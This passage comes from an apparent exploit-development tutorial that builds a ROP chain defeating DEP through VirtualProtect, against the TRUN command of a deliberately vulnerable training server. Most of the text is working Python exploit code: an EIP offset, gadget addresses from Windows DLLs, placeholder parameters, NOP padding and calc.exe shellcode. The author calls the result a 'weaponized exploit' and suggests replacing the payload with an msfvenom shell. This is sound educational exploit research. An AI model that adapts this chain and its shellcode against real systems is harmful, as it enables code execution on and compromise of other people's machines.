rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))

EAX get β€œzeroed out”:

EAX now contains the value of what we would like the size parameter to be:

The memory address of the size parameter now points to the value of EAX, which is 0x300!:

It is time now to calculate the flNewProtect parameter.

0x40 is the intended value here. It is placed into EAX:

Then, EDX is increased by four and the DWORD within EDX (the flNewProtect placeholder) it manipulated to point to the value of EAX- which is 0x40! All of our parameters have successfully been added to the stack!:

All that is left now, is we need to jump back to the VirtualProtect call! but how will we do this?!

Remember very early in this tutorial, when we saved the old stack pointer into ECX? Then, we performed some calculations on ECX to increase it to equal the first β€œparameter”, the return address? Recall that the return address is four bytes greater than the place where VirtualProtect() is called. This means if we can decrement ECX by four bytes, it would contain the address of the call to VirtualProtect().

However, in assembly, one of the best registers to make calculations to is EAX. Since we are done with the parameters, we will move the value of ECX into EAX. We will then decrement EAX by four bytes. Then, we will exchange the EAX register (which contains the call to VirtualProtect() with ESP). At this point, the VirtualProtect() address will be in ESP. Since the exchange instruction will be apart of a ROP gadget, the ret at the end of the gadget will load new ESP (the VirtualProtect() address) into EIP- and thus executing the call to VirtualProtect() with all of the correct parameters on the stack!

There is one problem though. In the very beginning, we gave the arguments for return and lpAddress. These should contain the address of the shellcode, or the NOPS right before the shellcode. We only gave a 100-byte buffer between those parameters and our shellcode. We have added a lot of ROP chains since then, thus our shellcode is no longer located 100 bytes from the VirtualProtect() parameters.

There is a simple solution to this: we will make the address of return and lpAddress 100 bytes greater.

This will be changed at this part of the POC:

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

We will update it to the following, to make it 100 bytes greater, and land around our shellcode:

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget---

ROP gadgets for decrementing ECX, moving ECX into EAX, and exchanging EAX with ESP:

0x77e4a5e6: mov eax, ecx ; ret  ; kernel32.dll
0x41ac863b: dec eax ; dec eax ; ret  ;  WS2_32.dll
0x77d6fa6a: xchg eax, esp ; ret  ;  ntdll.dll

After all of the changes have been made, this is the final weaponized exploit has been created:

import struct
import sys
import os

import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, or where to jump after VirtualProtect call. Not officially apart of the "parameters"
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)  # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for pop ebp instruction in the above ROP gadget

# Now we need to return to where the VirutalProtect call is on the stack.
# ECX contains a value around the old stack pointer at this time (from the beginning). Put ECX into EAX
# and decrement EAX to get back to the function call- and then load EAX into ESP.
# Restoring the old stack pointer here.
rop2 += struct.pack ('<L', 0x77e4a5e6)   # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the flNewProtect ROP gadget
rop2 += struct.pack ('<L', 0x41ac863b)   # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41ac863b)  # 0x41ac863b: dec eax ; dec eax ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77d6fa6a)   # 0x77d6fa6a: xchg eax, esp ; ret  ;  (1 found)

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 9999))

ECX is moved into EAX:

EAX is then decremented by four bytes, to equal where the call to VirtualProtect() occurs on the stack:

EAX is then exchanged with ESP (EAX and ESP swap spaces):

As you can see, ESP points to the function call- and the ret loads that function call into the instruction pointer to kick off execution!:

As you can see, our calc.exe payload has been executed- and DEP has been defeated (the PowerShell windows shows the DEP policy. Open the image in a new tab to view it better)!!!!!:

You could replace the calc.exe payload with something like a shell- sure! This was just a POC payload, and there is something about shellcoding by hand, too that I love! ROP is so manual and requires living off the land, so I wanted a shellcode that reflected that same philosophy.

Final Thoughts

Please email me if you have any further questions! I can try to answer them as best I can. As I continue to start getting into more and more modern day exploit mitigation bypasses, I hope I can document some more of my discoveries and advances in exploit development.

Peace, love, and positivity :-)

ROP is different everytime. There is no one way to do it. However, I did learn a lot from this article, and referenced it. Thank you, Peter! :) You are a beast!
